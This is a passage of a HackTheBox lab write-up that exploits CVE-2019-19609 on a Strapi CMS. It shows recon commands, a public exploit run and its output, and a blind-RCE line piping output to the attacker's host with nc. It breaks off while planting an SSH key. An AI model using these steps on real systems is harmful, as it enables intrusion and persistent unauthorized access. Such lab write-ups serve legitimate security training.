-
Notifications
You must be signed in to change notification settings - Fork 0
/
horizontall.html
181 lines (149 loc) · 58.9 KB
/
horizontall.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Horizontall - HackTheBox Writeup (10.10.11.105) | samiko@127.0.0.1~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Horizontall - HackTheBox Writeup (10.10.11.105)">
<meta name="description" content="Easy-difficulty Linux box on exploiting CVE-2019-19609 on Strapi and CVE-2021-3129 on Laravel. A good refresher on reverse tunnelling with Chisel and subdomain enumeration techniques.">
<meta property="og:description" content="Easy-difficulty Linux box on exploiting CVE-2019-19609 on Strapi and CVE-2021-3129 on Laravel. A good refresher on reverse tunnelling with Chisel and subdomain enumeration techniques.">
<meta property="og:image" content="https://www.hackthebox.com/storage/avatars/e4ec7d8504fdb58b5e6b7ddc82aafc77.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.com/storage/avatars/e4ec7d8504fdb58b5e6b7ddc82aafc77.png"></span>
</div>
<h1 class="Header__Title">Horizontall - HackTheBox Writeup (10.10.11.105)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Sat, Jan 29, 2022</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--green">
<a href="tag/Easy">Easy</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--orange">
<a href="tag/Linux">Linux</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Web_Application">Web Application</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/Strapi">Strapi</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--yellow">
<a href="tag/Laravel">Laravel</a>
</span>
</div>
<div>
Easy-difficulty Linux box on exploiting CVE-2019-19609 on Strapi and CVE-2021-3129 on Laravel. A good refresher on reverse tunnelling with Chisel and subdomain enumeration techniques.
</div>
</header>
<article id="https://www.notion.so/f4a17f4a3739499f8d1c44de905a7f6f" class="PageRoot PageRoot--FullWidth"><h2 id="https://www.notion.so/3606b97be4f941959a8fafa1ef56b000" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/3606b97be4f941959a8fafa1ef56b000"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Preface</span></span></h2><div id="https://www.notion.so/a392cd52514840fe977e9e8c81a90527" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">It’s been a while since my last post, but with a new year comes new boxes to pwn 😇</span></span></p></div><div id="https://www.notion.so/03b53de77e7d4b8986d6a77951dfd7ab" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">To improve my notetaking and make the posts more readable, I’ve also decided to stay away from the usual dot-point format and switch to a paragraph approach, similar to my CTF challenge writeups. This should allow me to explain my thought process a little bit better.</span></span></p></div><h2 id="https://www.notion.so/2426d06749c844f4882b57aa85de0dfb" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/2426d06749c844f4882b57aa85de0dfb"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Reconnaissance</span></span></h2><div id="https://www.notion.so/e2918e086f8f4585a37c4693b1e0954a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Before we do anything, let’s add the target IP and hostname to our </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hosts</code></span><span class="SemanticString"> file:</span></span></p></div><div id="https://www.notion.so/ab7edb32cfaa40f292e963b4966af528" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo nano /etc/hosts</code></span></span></p></div><pre id="https://www.notion.so/e066621b57bf47a192eadd937591e38b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.11.105 horizontall.htb</span></span></span></code></pre><div id="https://www.notion.so/ace85904ff744143bdc8e7bb58187f20" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">As usual, we perform a simple port scan to see what kind of services the target is running.</span></span></p></div><div id="https://www.notion.so/2b6f85c4283e45b983fd451638333e2f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.11.105 > ports.nmap</code></span></span></p></div><pre id="https://www.notion.so/9daf213a8b294ce0a4ff375da9c913b0" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Nmap scan report for horizontall.htb (10.10.11.105)
Host is up (0.033s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 15.64 seconds</span></span></span></code></pre><div id="https://www.notion.so/886057493caf4294b97421cd04f5eed8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We see that the target has ports 22 and 80 open, let’s get more information about these two services by performing a script scan (-sC) with version detection enabled (-sV):</span></span></p></div><div id="https://www.notion.so/d6b30e9a3d674b2e9a2ecb67d7fbe658" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 22,80 10.10.11.105 > targeted.nmap</code></span></span></p></div><pre id="https://www.notion.so/67f57c7ed71144d7b3e89a765fa17262" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Nmap scan report for horizontall.htb (10.10.11.105)
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: horizontall
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.92 seconds</span></span></span></code></pre><div id="https://www.notion.so/f0eb8f06012a498aa0378b385b09612f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">The target is running an SSH server on port 22, and a website with Nginx 1.14.0 on port 80. The SSH version appears to be recent, so let’s begin by enumerating the HTTP server.</span></span></p></div><h2 id="https://www.notion.so/24f60a5208094412b7e19ab289952801" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/24f60a5208094412b7e19ab289952801"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><div id="https://www.notion.so/7caa375bf4794bbe9713a724eb49763b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">HTTP Enumeration</strong></span></span></p></div><div id="https://www.notion.so/cbfb205cffbd4ed28718c7fc69cd353e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Looking at the website on port 80, there doesn’t seem to be anything of interest. All of the buttons lead to dead links, and the contact box at the bottom does not seem to do anything either.</span></span></p></div><div id="https://www.notion.so/ab888e36233448a3b6aae992d0a8056e" class="Image Image--Normal"><figure><a href="https://i.imgur.com/FSRS81o.png?width=1056"><img src="https://i.imgur.com/FSRS81o.png?width=1056" style="width:1056px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/8cf616e688954ce3a6d4c92e230f311c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">From the nmap scan of the port and the detection result from Wappalyzer (browser extension for detecting website technologies), we see the site is running an old version of Nginx (1.14.0).</span></span></p></div><div id="https://www.notion.so/f53eb8c02e424de2ab1ee855d823163d" class="Image Image--Normal"><figure><a href="https://i.imgur.com/9K02Qod.png?width=432"><img src="https://i.imgur.com/9K02Qod.png?width=432" style="width:432px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/1440dddaf1c346b5b3b8533eef162a2e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">With that information in mind, we can try to search for vulnerabilities in that specific version of Nginx. I came across a critical off-by-one heap write vulnerability in the DNS resolver (</span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://googleprojectzero.blogspot.com/2016/12/chrome-os-exploit-one-byte-overflow-and.html">CVE-2021-23017</a></span><span class="SemanticString">) that in theory, can lead to remote code execution. Unfortunately, this vulnerability could not be exploited as it requires the attacker to forge UDP packets from the DNS server, which we do not have control over. Seeing as the vulnerability can also cause the worker process to crash (DoS), I realised this was not the intended solution and moved on.</span></span></p></div><div id="https://www.notion.so/7259edd6fdcf4fefb94094a8d6222410" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">To find out more about the website’s structure, we can use </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">gobuster</code></span><span class="SemanticString"> to bruteforce the directory listings on the site:</span></span></p></div><div id="https://www.notion.so/7c97a830b1f74002a5ca78136d0ff5e6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster dir -w ~/HTB/Common/directory-list-2.3-medium.txt -u http://horizontall.htb/</code></span></span></p></div><pre id="https://www.notion.so/55e0b4a49fff4b0e9093592815ead669" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>===============================================================
/img (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
/css (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
/js (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]</span></span></span></code></pre><div id="https://www.notion.so/94ae48b6b1ac4e8d9e2af93be823a545" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Again, nothing interesting. The JavaScript is fairly stock-standard and seems to be from the website template, nothing useful in the CSS either.</span></span></p></div><div id="https://www.notion.so/e1d435287ddc48a7b5a7df08ac62b209" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">After much time wasted in enumerating the website to no avail, I tried bruteforcing for other subdomains:</span></span></p></div><div id="https://www.notion.so/6bb533ac64c04f1ea0813be1dd3f7595" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster vhost -w ~/HTB/Common/subdomains-top1million-110000.txt -u http://horizontall.htb/</code></span></span></p></div><pre id="https://www.notion.so/4e50fcaa5d9e4900a0b8dc921fc73f18" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>===============================================================
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]</span></span></span></code></pre><div id="https://www.notion.so/7e5c5123b2344be1aaed1a8cb9af723b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Great! We found an </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">api-prod</code></span><span class="SemanticString"> subdomain that could be useful for us. Let’s append it to the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hosts</code></span><span class="SemanticString"> file:</span></span></p></div><div id="https://www.notion.so/1212b3bbe2954f5ea9a906e51faba413" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo nano /etc/hosts</code></span></span></p></div><pre id="https://www.notion.so/dcd717c261a742ccb0fa1749e95cbe0d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.11.105 horizontall.htb api-prod.horizontall.htb</span></span></span></code></pre><div id="https://www.notion.so/2f74df0397fb442fa40f3be36fd9bcc6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">API Subdomain Enumeration</strong></span></span></p></div><div id="https://www.notion.so/b728d962f0754bb5939307b3e4245748" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Visiting the new API subdomain, we see a blank page with only the words “Welcome”:</span></span></p></div><div id="https://www.notion.so/87477b236b6c4b35ba81c61f87eb59d1" class="Image Image--Normal"><figure><a href="https://i.imgur.com/O93wHPh.png?width=432"><img src="https://i.imgur.com/O93wHPh.png?width=432" style="width:432px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/7a4c1ac2ae9041a98e102bc962662d96" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Repeating the previous enumeration process, let’s bruteforce the directory listings on the API subdomain with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">gobuster</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/c229ca754d3248f3a8b451ef4e8f9fc2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster dir -w ~/HTB/Common/directory-list-2.3-medium.txt -u http://api-prod.horizontall.htb/</code></span></span></p></div><pre id="https://www.notion.so/aca180d0263a4310a931af8ca0b8dc9b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>===============================================================
/reviews (Status: 200) [Size: 507]
/users (Status: 403) [Size: 60]
/admin (Status: 200) [Size: 854]</span></span></span></code></pre><div id="https://www.notion.so/6098ac9962434534a46178ba23f351d5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Browsing the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/reviews</code></span><span class="SemanticString"> path, we can find some very nicely written customer reviews:</span></span></p></div><div id="https://www.notion.so/99f2fccda11d41e48e1e4dfe10565b20" class="Image Image--Normal"><figure><a href="https://i.imgur.com/dpcxAud.png?width=576"><img src="https://i.imgur.com/dpcxAud.png?width=576" style="width:576px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/bc19f6bc82ee448ab77f3da5f2931c6f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Visiting </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/admin</code></span><span class="SemanticString">, we are redirected to a login page for a Strapi CMS dashboard:</span></span></p></div><div id="https://www.notion.so/c503b6de4f2c489693a9331ab63e6a1c" class="Image Image--Normal"><figure><a href="https://i.imgur.com/yQuh1dK.png?width=720"><img src="https://i.imgur.com/yQuh1dK.png?width=720" style="width:720px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><h2 id="https://www.notion.so/0edf9a2699e84cbb8dc5a4ca333d73c5" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/0edf9a2699e84cbb8dc5a4ca333d73c5"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><div id="https://www.notion.so/95dacbecb0d34a5a8a0e7f7d32324817" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Exploiting Strapi with CVE-2019-19609</strong></span></span></p></div><div id="https://www.notion.so/cf5dacb5193d4c359ff2a1f2497be082" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">A quick search for Strapi reveals the software had suffered from an unauthenticated RCE vulnerability in its plugin install component of the admin panel (</span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19609">CVE-2019-19609</a></span><span class="SemanticString">). The vulnerability is caused by insufficient input sanitisation of plugin names in the Install and Uninstall Plugin components of the admin panel, so attackers can inject arbitrary shell commands to be executed by the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">execa</code></span><span class="SemanticString"> function. Exploits for this vulnerability are widely available online, </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://www.exploit-db.com/exploits/50239">here is one written by Musyoka Ian</a></span><span class="SemanticString"> (EDB-50239).</span></span></p></div><div id="https://www.notion.so/2636caf03ea84988b2ebcdca68f0d6fb" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ python /usr/share/exploitdb/exploits/multiple/webapps/50239.py http://api-prod.horizontall.htb/</code></span></span></p></div><pre id="https://www.notion.so/7be872632e89485fa99c7387afc53d98" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQyMjU4NjU2LCJleHAiOjE2NDQ4NTA2NTZ9.-P7dzFedeHpbuMf_Lm6o3yXbO516Dx6vquvCoRh6x1s
$> _</span></span></span></code></pre><div id="https://www.notion.so/e22b1142bf61494496900785072a3e21" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Using the exploit, we successfully reset the administrator’s credentials as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">admin:SuperStrongPassword1</code></span><span class="SemanticString">, and gained the ability to execute code on the server as indicated by the prompt.</span></span></p></div><div id="https://www.notion.so/f333fec2b8294d9c891ff5172b3f7643" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$> id</code></span></span></p></div><pre id="https://www.notion.so/299db80f3a634421b0456f8b661f2fba" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">[</span>+<span class="token punctuation">]</span> Triggering Remote code executin
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Rember this is a blind RCE don't expect to see output
<span class="token punctuation">{</span><span class="token property">"statusCode"</span><span class="token operator">:</span><span class="token number">400</span><span class="token punctuation">,</span><span class="token property">"error"</span><span class="token operator">:</span><span class="token string">"Bad Request"</span><span class="token punctuation">,</span><span class="token property">"message"</span><span class="token operator">:</span><span class="token punctuation">[</span><span class="token punctuation">{</span><span class="token property">"messages"</span><span class="token operator">:</span><span class="token punctuation">[</span><span class="token punctuation">{</span><span class="token property">"id"</span><span class="token operator">:</span><span class="token string">"An error occurred"</span><span class="token punctuation">}</span><span class="token punctuation">]</span><span class="token punctuation">}</span><span class="token punctuation">]</span><span class="token punctuation">}</span></span></span></span></code></pre><div id="https://www.notion.so/289974761a4e4aa5abd695e3a26f18a4" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We won’t be able to see any output with the exploit, as it is a blind RCE. Luckily, we can circumvent this limitation by setting up a listener on our attacker machine, then piping the victim output to us with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">nc</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/77abd6c6ac7b490da4e711a0debe2903" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 9001</code></span></span></p></div><div id="https://www.notion.so/03b410478f6942529d4d3b313b3451de" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$> id | nc 10.10.14.45 9001</code></span></span></p></div><pre id="https://www.notion.so/266c81b4c02a4719a6623391c8b30858" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>listening on [any] 9001 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.105] 52682
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)</span></span></span></code></pre><div id="https://www.notion.so/84483ac118234eab8c21984ebd9eafee" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Looks like we’re in as the Strapi user.</span></span></p></div><div id="https://www.notion.so/29a02d9c39644b7ca8730ac6fdb86707" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Gaining SSH access</strong></span></span></p></div><div id="https://www.notion.so/f4df705cd29f41a88e9a9f847377e62a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Still, we can do much better. Let’s grant ourselves SSH access by appending our public key to the user’s </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">authorized_keys</code></span><span class="SemanticString"> file. To do this, we can first copy our </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">id_rsa.pub</code></span><span class="SemanticString"> file to a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">www</code></span><span class="SemanticString"> directory, and host it such that it can be accessed by the victim as so:</span></span></p></div><div id="https://www.notion.so/dee0068772bc420aa42cb841bc4be6c4" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cp ~/.ssh/id_rsa.pub .</code></span></span></p></div><div id="https://www.notion.so/ad01529b52ec4fc7bbbd732e9fd28a35" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ python -m http.server</code></span></span></p></div><div id="https://www.notion.so/dfbd602c4e8f497688012baea5817949" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Then, use </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">curl</code></span><span class="SemanticString"> on the victim machine to create an </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">authorized_keys</code></span><span class="SemanticString"> file containing our public key. We also add the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">--create-dirs</code></span><span class="SemanticString"> option, just in case the directory doesn’t exist in our user’s folder already:</span></span></p></div><div id="https://www.notion.so/d9548c785683497dbaf5c51774135ef8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code 